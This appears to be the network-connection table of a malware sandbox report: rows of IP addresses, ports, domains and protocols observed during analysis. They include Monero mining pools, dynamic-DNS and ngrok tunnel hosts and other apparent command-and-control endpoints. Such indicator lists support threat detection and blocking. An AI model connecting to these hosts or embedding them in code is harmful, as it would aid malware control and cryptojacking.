| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| RU | 92.127.156.174:8880 | 92.127.156.174 | tcp |
| US | 8.8.8.8:53 | 174.156.127.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | home.fvtekx5vs.top | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| NL | 51.15.61.114:10343 | xmr-eu2.nanopool.org | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 114.61.15.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | bing.com | udp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 212.47.253.124:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.253.47.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | home.fvtekx5vs.top | udp |
| US | 193.222.96.100:5555 | tcp | |
| NL | 185.180.196.46:80 | 185.180.196.46 | tcp |
| US | 8.8.8.8:53 | 46.196.180.185.in-addr.arpa | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| US | 8.8.8.8:53 | home.fvtekx5vs.top | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | up.maolaoban.top | udp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 162.159.134.234:443 | gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| DE | 185.232.59.135:80 | up.maolaoban.top | tcp |
| US | 8.8.8.8:53 | 234.134.159.162.in-addr.arpa | udp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | c1.5yyz.com | udp |
| US | 8.8.8.8:53 | 135.59.232.185.in-addr.arpa | udp |
| CN | 113.142.207.35:80 | c1.5yyz.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| TH | 45.141.26.180:443 | 45.141.26.180 | tcp |
| US | 8.8.8.8:53 | 180.26.141.45.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 104.200.16.74:8090 | 104.200.16.74 | tcp |
| US | 8.8.8.8:53 | 74.16.200.104.in-addr.arpa | udp |
| US | 64.94.85.117:443 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | c2.5yyz.com | udp |
| US | 20.83.148.22:80 | tcp | |
| CN | 113.65.5.223:8283 | c2.5yyz.com | tcp |
| RU | 62.113.117.95:4449 | tcp | |
| US | 8.8.8.8:53 | 18.ip.gl.ply.gg | udp |
| US | 147.185.221.18:8808 | 18.ip.gl.ply.gg | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| BG | 195.230.23.72:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | cdn.ly.9377.com | udp |
| GB | 79.133.176.222:80 | cdn.ly.9377.com | tcp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 222.176.133.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 162.159.135.234:443 | gateway.discord.gg | tcp |
| N/A | 127.0.0.1:55892 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | client.9377.com | udp |
| CN | 120.79.30.240:80 | client.9377.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | eoufaoeuhoauengi.su | udp |
| RU | 185.215.113.66:80 | eoufaoeuhoauengi.su | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | apps.game.qq.com | udp |
| HK | 43.129.139.164:80 | apps.game.qq.com | tcp |
| US | 104.219.239.11:6969 | tcp | |
| CN | 113.142.207.35:80 | c1.5yyz.com | tcp |
| US | 8.8.8.8:53 | 164.139.129.43.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| RU | 185.215.113.66:80 | eoufaoeuhoauengi.su | tcp |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.66:80 | eoufaoeuhoauengi.su | tcp |
| RU | 62.113.117.95:4449 | tcp | |
| US | 147.185.221.18:7707 | 18.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 193.222.96.100:5555 | tcp | |
| RU | 185.215.113.66:80 | eoufaoeuhoauengi.su | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CN | 113.65.5.223:8283 | c2.5yyz.com | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| CN | 120.76.203.28:80 | client.9377.com | tcp |
| US | 8.8.8.8:53 | 84.113.215.185.in-addr.arpa | udp |
| US | 64.94.85.117:443 | tcp | |
| RU | 185.215.113.66:80 | eoufaoeuhoauengi.su | tcp |
| TH | 154.197.69.165:443 | 154.197.69.165 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 165.69.197.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 104.243.129.2:80 | 104.243.129.2 | tcp |
| US | 8.8.8.8:53 | 2.129.243.104.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | eoufaoeuhoauengi.su | tcp |
| US | 104.219.239.11:6969 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| BE | 142.251.173.94:443 | update.googleapis.com | tcp |
| TH | 110.164.203.191:7000 | tcp | |
| US | 8.8.8.8:53 | 94.173.251.142.in-addr.arpa | udp |
| BE | 142.251.173.94:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 136.206.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 123.35.104.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.233.202.91.in-addr.arpa | udp |
| US | 147.185.221.18:6606 | 18.ip.gl.ply.gg | tcp |
| US | 193.222.96.100:5555 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | www.y2126.com | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| US | 8.8.8.8:53 | 108.209.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| IR | 85.185.218.219:40500 | udp | |
| KZ | 84.240.235.134:40500 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 219.218.185.85.in-addr.arpa | udp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | aefieiaehfiaehr.top | udp |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| YE | 46.35.79.193:40500 | udp | |
| US | 8.8.8.8:53 | 193.79.35.46.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| UZ | 62.209.135.143:40500 | udp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 143.135.209.62.in-addr.arpa | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 64.94.85.117:443 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 104.219.239.11:6969 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 92.122.63.136:443 | steamcommunity.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| US | 8.8.8.8:53 | 136.63.122.92.in-addr.arpa | udp |
| DE | 116.203.12.9:443 | tcp | |
| US | 147.185.221.18:8808 | 18.ip.gl.ply.gg | tcp |
| VE | 38.222.194.190:40500 | udp | |
| US | 8.8.8.8:53 | 190.194.222.38.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| TH | 110.164.203.191:7000 | tcp | |
| US | 193.222.96.100:5555 | tcp | |
| UZ | 93.188.83.239:40500 | udp | |
| US | 104.219.239.11:6969 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| US | 8.8.8.8:53 | 239.83.188.93.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| YE | 46.161.239.195:40500 | udp | |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| US | 8.8.8.8:53 | 195.239.161.46.in-addr.arpa | udp |
| IR | 2.182.195.184:40500 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| AF | 149.54.35.210:40500 | udp | |
| US | 8.8.8.8:53 | 210.35.54.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | funletters.net | udp |
| US | 208.122.221.162:80 | funletters.net | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| US | 8.8.8.8:53 | 162.221.122.208.in-addr.arpa | udp |
| RU | 62.113.117.95:4449 | tcp | |
| US | 8.8.8.8:53 | 208.242.5.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.128.107.74:8808 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| BE | 142.251.173.94:443 | update.googleapis.com | tcp |
| UZ | 90.156.167.42:40500 | udp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 8.8.8.8:53 | 42.167.156.90.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 213.206.44.35:40500 | udp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| TH | 110.164.203.191:7000 | tcp | |
| US | 8.8.8.8:53 | 35.44.206.213.in-addr.arpa | udp |
| US | 147.185.221.18:6606 | 18.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| CN | 222.186.172.42:1000 | tcp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 134.130.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| UZ | 90.156.162.72:40500 | udp | |
| US | 8.8.8.8:53 | 72.162.156.90.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| UZ | 90.156.164.28:40500 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| YE | 134.35.203.184:40500 | udp | |
| US | 8.8.8.8:53 | 184.203.35.134.in-addr.arpa | udp |
| RU | 62.113.117.95:4449 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| IR | 77.81.130.60:40500 | udp | |
| US | 8.8.8.8:53 | 60.130.81.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 3.128.107.74:8080 | 2.tcp.ngrok.io | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| UZ | 90.156.164.103:40500 | udp | |
| US | 8.8.8.8:53 | 103.164.156.90.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 147.185.221.18:9028 | 18.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | safe.ywxww.net | udp |
| TH | 110.164.203.191:7000 | tcp | |
| CN | 60.191.236.246:820 | safe.ywxww.net | tcp |
| UZ | 213.230.124.7:40500 | udp | |
| US | 8.8.8.8:53 | 7.124.230.213.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| UZ | 89.236.234.204:40500 | udp | |
| US | 8.8.8.8:53 | 204.234.236.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| IR | 89.44.147.157:40500 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| UZ | 90.156.162.101:40500 | udp | |
| US | 8.8.8.8:53 | 101.162.156.90.in-addr.arpa | udp |
| RU | 62.113.117.95:4449 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| RU | 37.21.26.152:40500 | udp | |
| NL | 178.132.2.10:4000 | tcp | |
| US | 8.8.8.8:53 | 152.26.21.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.173.189.20.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| N/A | 127.0.0.1:6606 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| IR | 2.176.72.136:40500 | udp | |
| US | 8.8.8.8:53 | 136.72.176.2.in-addr.arpa | udp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 104.219.239.11:6969 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 10.244.41.31.in-addr.arpa | udp |
| HK | 154.201.87.30:8888 | 154.201.87.30 | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 147.185.221.18:8808 | 18.ip.gl.ply.gg | tcp |
| N/A | 127.0.0.1:7707 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| UZ | 195.158.21.74:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 74.21.158.195.in-addr.arpa | udp |
| US | 64.94.85.117:443 | tcp | |
| US | 8.8.8.8:53 | souhu.ydns.eu | udp |
| HK | 202.181.25.108:16681 | souhu.ydns.eu | tcp |
| US | 8.8.8.8:53 | v8.ter.tf | udp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| TH | 110.164.203.191:7000 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| SY | 95.212.132.231:40500 | udp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 8.8.8.8:53 | 231.132.212.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.22.53.161:8808 | 2.tcp.ngrok.io | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| HK | 202.181.25.108:16681 | souhu.ydns.eu | tcp |
| US | 8.8.8.8:53 | v8.ter.tf | udp |
| IR | 5.134.199.85:40500 | udp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | 85.199.134.5.in-addr.arpa | udp |
| ID | 203.142.81.102:40500 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | v8.ter.tf | udp |
| DZ | 41.102.19.3:40500 | udp | |
| US | 8.8.8.8:53 | 3.19.102.41.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| RU | 95.189.161.127:40500 | tcp | |
| US | 8.8.8.8:53 | v8.ter.tf | udp |
| RO | 37.120.247.6:40500 | udp | |
| US | 8.8.8.8:53 | 6.247.120.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.21:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 16.182.32.49:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 21.142.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | v8.ter.tf | udp |
| IR | 2.190.49.145:40500 | udp | |
| US | 147.185.221.18:8808 | 18.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | 49.32.182.16.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.49.190.2.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 8.8.8.8:53 | v8.ter.tf | udp |
| RU | 80.240.253.7:40500 | udp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 7.253.240.80.in-addr.arpa | udp |
| TH | 110.164.203.191:7000 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 3.22.53.161:17027 | 2.tcp.ngrok.io | tcp |
| HK | 202.181.25.108:16681 | souhu.ydns.eu | tcp |
| KZ | 89.218.238.106:40500 | udp | |
| RU | 62.113.117.95:4449 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 106.238.218.89.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| IR | 151.232.245.146:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 146.245.232.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | csg-app.com | udp |
| US | 50.116.92.169:443 | csg-app.com | tcp |
| US | 3.22.53.161:8808 | 2.tcp.ngrok.io | tcp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 169.92.116.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| BG | 195.230.23.72:80 | tcp | |
| US | 64.94.85.117:443 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cowod.hopto.org | udp |
| US | 104.219.239.11:6969 | tcp | |
| VE | 38.166.109.33:40500 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | zoom.us | udp |
| US | 170.114.52.2:443 | zoom.us | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 2.52.114.170.in-addr.arpa | udp |
| KZ | 178.89.193.218:40500 | udp | |
| US | 8.8.8.8:53 | 218.193.89.178.in-addr.arpa | udp |
| US | 147.185.221.18:8808 | 18.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| KZ | 37.151.133.175:40500 | udp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 175.133.151.37.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| TH | 110.164.203.191:7000 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| RU | 62.113.117.95:4449 | tcp | |
| EG | 62.114.143.56:40500 | udp | |
| US | 8.8.8.8:53 | 56.143.114.62.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| IR | 188.209.32.217:40500 | udp | |
| US | 8.8.8.8:53 | 217.32.209.188.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 2.tcp.ngrok.io | udp |
| US | 3.131.207.170:8080 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | upload.vina-host.com | udp |
| VN | 125.212.220.95:443 | upload.vina-host.com | tcp |
| KZ | 95.59.33.46:40500 | udp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 8.8.8.8:53 | 95.220.212.125.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.33.59.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| VE | 190.202.1.132:40500 | tcp | |
| SY | 82.100.175.13:40500 | udp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 13.175.100.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 147.185.221.18:9028 | 18.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | download.skycn.com | udp |
| US | 20.83.148.22:80 | tcp | |
| CN | 116.114.98.35:80 | download.skycn.com | tcp |
| MX | 189.130.171.120:40500 | udp | |
| US | 8.8.8.8:53 | 120.171.130.189.in-addr.arpa | udp |
| US | 64.94.85.117:443 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 104.219.239.11:6969 | tcp | |
| RU | 62.113.117.95:4449 | tcp | |
| AO | 154.71.253.54:40500 | udp | |
| US | 8.8.8.8:53 | 54.253.71.154.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| TH | 110.164.203.191:7000 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 195.158.31.102:40500 | udp | |
| US | 8.8.8.8:53 | 102.31.158.195.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| KZ | 77.240.41.134:40500 | udp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 134.41.240.77.in-addr.arpa | udp |
| US | 193.222.96.100:5555 | tcp | |
| UZ | 90.156.162.106:40500 | tcp | |
| IR | 5.219.44.252:40500 | udp | |
| N/A | 127.0.0.1:7707 | tcp | |
| US | 8.8.8.8:53 | 252.44.219.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| CN | 47.104.173.216:9876 | tcp | |
| US | 147.185.221.18:8808 | 18.ip.gl.ply.gg | tcp |
| KZ | 95.58.74.111:40500 | udp | |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | 111.74.58.95.in-addr.arpa | udp |
| US | 3.131.207.170:17027 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| RU | 62.113.117.95:4449 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| PK | 39.48.235.83:40500 | udp | |
| US | 8.8.8.8:53 | 83.235.48.39.in-addr.arpa | udp |
| US | 104.219.239.11:6969 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| YE | 134.35.126.112:40500 | udp | |
| US | 8.8.8.8:53 | 112.126.35.134.in-addr.arpa | udp |
| TH | 110.164.203.191:7000 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| KZ | 89.218.44.218:40500 | udp | |
| US | 8.8.8.8:53 | 218.44.218.89.in-addr.arpa | udp |
| US | 3.131.207.170:8808 | 2.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 912648.aioc.qbgxl.com | udp |
| US | 104.219.239.11:6969 | tcp | |
| CN | 61.160.195.64:80 | 912648.aioc.qbgxl.com | tcp |
| US | 64.94.85.117:443 | tcp | |
| UZ | 90.156.194.146:40500 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| KZ | 37.99.54.230:40500 | udp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| US | 8.8.8.8:53 | 230.54.99.37.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 193.222.96.100:5555 | tcp | |
| US | 147.185.221.18:6606 | 18.ip.gl.ply.gg | tcp |
| NL | 178.132.2.10:4000 | tcp | |
| US | 8.8.8.8:53 | sayrich.ddns.net | udp |
| RU | 62.113.117.95:4449 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 104.219.239.11:6969 | tcp | |
| MX | 189.252.61.8:40500 | udp | |
